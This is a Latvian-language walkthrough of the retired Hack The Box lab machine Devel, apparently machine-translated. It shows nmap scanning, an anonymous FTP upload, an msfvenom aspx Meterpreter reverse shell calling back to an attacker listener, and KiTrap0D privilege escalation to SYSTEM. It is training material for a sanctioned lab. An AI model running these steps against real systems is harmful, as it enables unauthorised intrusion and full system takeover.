Esi mierīgs un uzlauzi kastīti - Devel

Hack The Box (HTB) ir tiešsaistes platforma, kas ļauj pārbaudīt savas iespiešanās pārbaudes prasmes. Tajā ir vairākas problēmas, kuras tiek pastāvīgi atjauninātas. Daži no viņiem simulē reālās pasaules scenārijus un daži no viņiem vairāk orientējas uz CTF izaicinājuma stilu.

Piezīme . Ir atļauts reģistrēt tikai pensionētos HTB aparātus.

Devel tiek aprakstīts kā salīdzinoši vienkāršs lodziņš, kas parāda drošības riskus, kas saistīti ar dažām noklusējuma programmu konfigurācijām. Tā ir iesācēja līmeņa mašīna, kuru var nokomplektēt, izmantojot publiski pieejamus izmantojumus.

Mēs izmantosim šādus rīkus, lai ieķīlātu kastīti Kali Linux lodziņā

  • nmap
  • zenmap
  • searchsploit
  • metasploit
  • msfvenom

1. solis - tīkla skenēšana

Pirmais solis pirms mašīnas izmantošanas ir mazliet veikt skenēšanu un iepazīšanos.

Šī ir viena no vissvarīgākajām daļām, jo ​​tā noteiks to, ko jūs varat mēģināt izmantot pēc tam. Vienmēr labāk ir veltīt vairāk laika šai fāzei, lai iegūtu pēc iespējas vairāk informācijas.

Es izmantošu Nmap (Network Mapper), kas ir bezmaksas un atvērtā koda utilīta tīkla atklāšanai un drošības auditam. Tas izmanto neapstrādātas IP paketes, lai noteiktu, kādi resursdatori ir pieejami tīklā, kādus pakalpojumus šie resursdatori piedāvā, kādas operētājsistēmas viņi darbojas, kāda veida pakešu filtri / ugunsmūri tiek izmantoti, un desmitiem citu īpašību.

Ir daudz komandu, kuras varat izmantot ar šo rīku, lai skenētu tīklu. Ja vēlaties uzzināt vairāk par to, šeit varat apskatīt dokumentāciju.

Es izmantoju šo komandu, lai iegūtu pamatideju par to, ko mēs skenējam

nmap -sV -O -F --version-light 10.10.10.5

-sV: pārbaudiet atvērtos portus, lai noteiktu pakalpojuma / versijas informāciju

-O: Iespējot OS noteikšanu

-F: Ātrs režīms - skenējiet mazāk portu nekā noklusējuma skenēšana

--versija-gaisma: ierobežojums, visticamāk, zondēm (2. intensitāte)

10.10.10. 5 : lodziņa Devel IP adrese

Varat arī izmantot Zenmap , kas ir oficiālā Nmap drošības skenera GUI. Tā ir daudzplatforma, bezmaksas un atvērtā koda lietojumprogramma, kuras mērķis ir padarīt Nmap iesācējiem viegli lietojamu, vienlaikus nodrošinot uzlabotas funkcijas pieredzējušiem Nmap lietotājiem.

Lai veiktu intensīvu skenēšanu, es izmantoju citu komandu kopu

nmap -A -v 10.10.10.5

-A: iespējojiet OS noteikšanu, versiju noteikšanu, skriptu skenēšanu un izsekošanas maršrutu

-v: Palieliniet daudzbalsības līmeni

10.10.10.5: lodziņa Devel IP adrese

Ja rezultāti jums šķiet mazliet par milzīgu, varat pāriet uz cilni Porti / Hosts, lai iegūtu tikai atvērtās ostas.

Mēs varam redzēt, ka ir 2 atvērtas ostas:

21. osta . Failu pārsūtīšanas protokola (FTP) vadība (komanda). Šeit tas ir Microsoft FTP

80. osta . Hiperteksta pārsūtīšanas protokols (HTTP). Šeit tas ir IIS serveris

Visticamāk Sākotnējais uzbrukuma vektoru, šķiet, ir FTP šajā gadījumā

2. solis - neaizsargātais FTP

Mēs atveram Firefox un apmeklējam vietni vietnē //10.10.10.5

Kopš iepazīšanās fāzes mēs atradām 2 failus zem Microsoft FTP. Apskatīsim, vai mēs varam tiem piekļūt no pārlūkprogrammas.

Varu piekļūt welcome.png attēla failam, apmeklējot vietni

//10.10.10.5/welcome.png

Es varu arī piekļūt iisstart.htm lapā

//10.10.10.5/iisstart.htm

Tagad mēs zinām divas lietas:

  • FTP tiek izmantots kā failu serveris tīmekļa serverim - tas tika atklāts, kad failiem piekļuvām no atjaunošanas fāzes.
  • FTP ļauj anonīmi pieteikties - tas tika atklāts, kad mēs veicām intensīvu skenēšanu.

Apskatīsim, vai mēs varam izveidot failu un pievienot to FTP

Izmantojot šo komandu, es izveidoju failu un izvadu rezultātu uz failu ar nosaukumu htb.html

echo HackTheBox > htb.html

Pēc tam ar ls pārbaudu, vai fails ir izveidots un kāds ir faila saturs ar šo komandu

cat htb.html

Tagad pievienosimies FTP, lai pievienotu mūsu testa failu

Lai izveidotu savienojumu ar FTP, es izmantoju šo komandu

ftp 10.10.10.5

Es ievadu anonīmu kā lietotājvārdu un vienkārši nospiediet paroli, lai ievadītu anonīmu.

Tagad esmu izveidojis savienojumu ar FTP.

Ar šo komandu pievienoju failu FTP

put htb.html

Fails ir veiksmīgi nosūtīts. Pārbaudīsim, vai mēs tam varam piekļūt no Firefox. Es apmeklēju lapu, un mēs varam redzēt produkciju HackTheBox tīmekļa lapā.

//10.10.10.5/htb.html

Tagad, kad mēs zinām, ka varam pārsūtīt failus, izveidosim ekspluatāciju!

3. solis - MSFvenom izmantošana, lai izveidotu ekspluatāciju

Mēs izmantosim MSFvenom, kas ir lietderīgās slodzes ģenerators. Jūs varat uzzināt vairāk par to šeit

Bet vispirms pārbaudīsim Metasploit Framework, kura krava mums būs nepieciešama, lai izstrādātu mūsu ekspluatāciju.

Mēs zinām, ka mums ir jāizveido reverss apvalks , kas ir tāda veida apvalks, kurā mērķa mašīna atkal sazinās ar uzbrūkošo mašīnu. Uzbrūkošajai mašīnai ir klausītāja ports, kurā tā saņem savienojumu, kas tiek sasniegts, izmantojot vai kodu izpildot.

Apgrieztajam TCP apvalkam jābūt Windows, un mēs izmantosim Meterpreter .

No vietnes Offensive Security mēs iegūstam šo Meterpreter definīciju

Meterpreter ir uzlabota, dinamiski paplašināma lietderīgā slodze, kas izmanto atmiņā esošās DLL injicēšanas pakāpienus un tiek izpildes laikā paplašināta tīklā. Tas sazinās pa posma ligzdu un nodrošina visaptverošu klienta puses Ruby API. Tajā ir komandu vēsture, cilnes aizpildīšana, kanāli un daudz kas cits.

Vairāk par Meterpreter varat lasīt šeit.

Es palaižu Metasploit un meklēju reversās TCP lietderīgās slodzes. Es izmantoju šādu komandu

search windows/meterpreter/reverse_tcp

Mēs atrodam interesantu kravnesību, 2. numuru, kas ir Reverse TCP Stager .Šī lietderīgā slodze injicē skaitītāja servera DLL, izmantojot Reflective Dll Injection lietderīgo slodzi, un izveido savienojumu ar uzbrucēju.

payload/windows/meterpreter/reverse_tcp

Tagad atgriezīsimies pie msfvenom, lai izstrādātu mūsu izmantošanas iespējas. Un precīzāk aspx reversais apvalks. Šī informācija ir apkopota pārstrādes posmā

Es izmantoju šādu komandu

msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o devel.aspx LHOST=10.10.14.15 LPORT=4444

- p : izmantojamā krava

- f : izvades formāts

- 0 : saglabājiet lietderīgo slodzi failā

LHOST : vietējais resursdators

LPORT : vietējā osta

Pēc tam ar ls pārbaudu, vai fails ir izveidots. Ir pienācis laiks to nosūtīt FTP

Atkārtoti izveidosim savienojumu ar FTP un nosūtīsim mūsu mazo dāvanu!

Es izveidoju savienojumu ar FTP, ievadu anonīmu kā lietotājvārdu, izlaižu paroli, nospiežot enter. Pēc tam es nosūtu failu ar šādu komandu

put devel.aspx

Pārbaudīsim, vai fails ir pareizi nosūtīts. Atgriežoties pie Firefox , es dodos uz FTP serveri ar šādu komandu

ftp://10.10.10.5

Mēs varam redzēt, ka mūsu mazā dāvana ir klāt!

Lūk, kāds ir izmantojums, ja vēlaties zināt, kā tas izskatās

4. solis - iestatiet klausītāju, izmantojot Metasploit

Atpakaļ uz Metasploit, kur es izmantoju šādu komandu, lai iestatītu lietderīgās kravas apstrādātāju

use exploit/multi/handler

Pārbaudu, kuras opcijas ir pieejamas

Vispirms mēs iestatījām lietderīgo slodzi

set payload windows/meterpreter/reverse_tcp

Tad LHOST

set lhost 10.10.14.15

Un visbeidzot LPORT

set lport 4444

Ja mēs tagad pārbaudītu iespējas, mums vajadzētu redzēt, ka viss ir iestatīts

Palaidīsim ekspluatāciju.

Pēc šī ziņojuma parādīšanās

Started reverse TCP handler on 10.10.14.15:4444

atgriezieties pārlūkprogrammā un piekļūstiet lapai, kurā tiek mitināts ļaunprātīgais skripts

//10.10.10.5/devel.aspx

Pēc tam jums vajadzētu redzēt izveidoto Meterpreter sesiju

Tagad, kad man ir sesija, es mēģinu meklēt pirmo karogu user.txt, izmantojot šādu skaitītāju skaitītāja komandu

search -f user.txt

Manam meklējumam neatbilst faili. Es mēģinu ar. * Redzēt citus failus, bet nekas noderīgs

Pēc tam es izveidoju čaulu ar šādu komandu

shell

Lai iegūtu sistēmas informāciju, es izmantoju šādu komandu

systeminfo

Mēs varam redzēt, ka reģistrēto īpašnieku sauc par babis . Tas varētu būt svarīga informācija, kad mēs meklēsim lietotāja karodziņu. Mēs varam arī redzēt, ka iekārtai nav labojumfailu.

Es sāku pārvietoties pa mapēm. Es izmantoju dir, lai uzskaitītu visus failus / mapes un CD, lai mainītu direktoriju. Mēģinu laimi babis un administratora mapēs, taču abas man lika piekļuvei atteikt.

Mums jāpaaugstina privilēģija! Zinot, ka, pārbaudot sistēmas informāciju, netika atrasti labojumi, mēs varam mēģināt atrast šai mašīnai piemērotus izmantojumus.

5. solis - privilēģiju eskalācijas veikšana

Es ar šo komandu ievietoju sesiju otrajā plānā

background

Pēc tam es izmantoju šādu komandu

use post/multi/recon/local_exploit_suggester

Šis modulis ierosina izmantot vietējos Meterpreter izmantojumus. Izmantošana tiek ieteikta, pamatojoties uz arhitektūru un platformu, kurai lietotājs ir atvēris čaulu, kā arī pieejamos izmantojumus Meterpreter

Pārbaudu opcijas un iestatu sesiju

Ir svarīgi atzīmēt, ka ne visi vietējie varoņi tiks izšauti. Izmantošana tiek izvēlēta, pamatojoties uz šiem nosacījumiem: sesijas veidu, platformu, arhitektūru un nepieciešamās noklusējuma opcijas

Dodoties uz leju sarakstā

exploit/windows/local/bypassuac_eventvwr

neizdodas, jo IIS lietotājs nav daļa no administratoru grupas, kas ir noklusējums un ir sagaidāms.

Es izmantoju nākamo izmantojumu sarakstā, kas ir

use exploit/windows/local/ms10_015_kitrap0d

Šis modulis izveidos jaunu sesiju ar SYSTEM privilēģijām, izmantojot Tavisa Ormandija KiTrap0D izmantošanu. Ja izmantotā sesija jau ir paaugstināta, ekspluatācija nedarbosies. Modulis balstās uz kitrap0d.x86.dll un netiek atbalstīts Windows x64 izdevumos.

Kad mēs palaidām sysinfo sesijā Meterpreter, tas atklāja, ka mērķis bija x86 arhitektūra

Es pārbaudu opcijas un pēc tam iestatu sesiju

Es vadu ekspluatāciju.

Izmantošana bija veiksmīga, taču sesiju nevarēja izveidot. Tas ir tāpēc, ka pirmajā izmantošanas rindā mēģina iestatīt reverso apstrādātāju noklusējuma eth0 un noklusējuma portā, nevis HTT laboratoriju VPN saskarni.

Started reverse TCP handler on 10.0.2.15:4444

Pārbaudu opcijas un iestatu LHOST un LPORT

Pēc tam es pārbaudu visas dzīvās sesijas ar šādu komandu, ja mana sesija nomira

sessions -l

Es redzu savu sesiju

Tagad, kad mums ir skaitītāja sesija, sāksim pārvietoties pa mapi un atrast karodziņus!

6. solis - meklējat karogu user.txt

Vispirms pārbaudīsim, kur mēs atrodamies, izmantojot šādu komandu

pwd

kas nozīmē drukas darbu direktoriju

Es aiziet līdz C: \ un ls visus failus / mapes. Es jau zinu, kur meklēt savu iepriekšējo mēģinājumu 4. solī - iestatīt klausītāju ar Metasploit

Es atgriezīšos Lietotāju direktorijā

Pēc tam pārejiet uz babis direktoriju

No turienes es eju uz direktoriju Desktop

Mēs atradām failu user.txt.txt ! Lai lasītu faila saturu, es izmantoju komandu

cat user.txt.txt

Tagad, kad mums ir lietotāja karogs, atrodam saknes karodziņu!

7. solis - meklējat root.txt karogu

Atgriežoties pie C: \, lai pārietu uz mapi Administrator, pēc tam uz mapi Desktop . Es izmantoju ls, lai visus failus uzskaitītu mapē Desktop

Mēs atrodam failu root.txt.txt !

Lai lasītu faila saturu, es izmantoju komandu

cat root.txt.txt

Apsveicu! Jūs atradāt abus karogus!

Lūdzu, nevilcinieties komentēt, uzdot jautājumus vai dalīties ar draugiem :)

Vairāk manu rakstu varat redzēt šeit

Jūs varat sekot man Twitter vai LinkedIn

Un neaizmirstiet # GetSecure , # BeSecure un # StaySecure !

Citi Hack The Box raksti

  • Esi mierīgs un Hack the Box - Lame
  • Esi mierīgs un Hack the Box - mantojums
  • Esi mierīgs un kapā kastīti - pīkst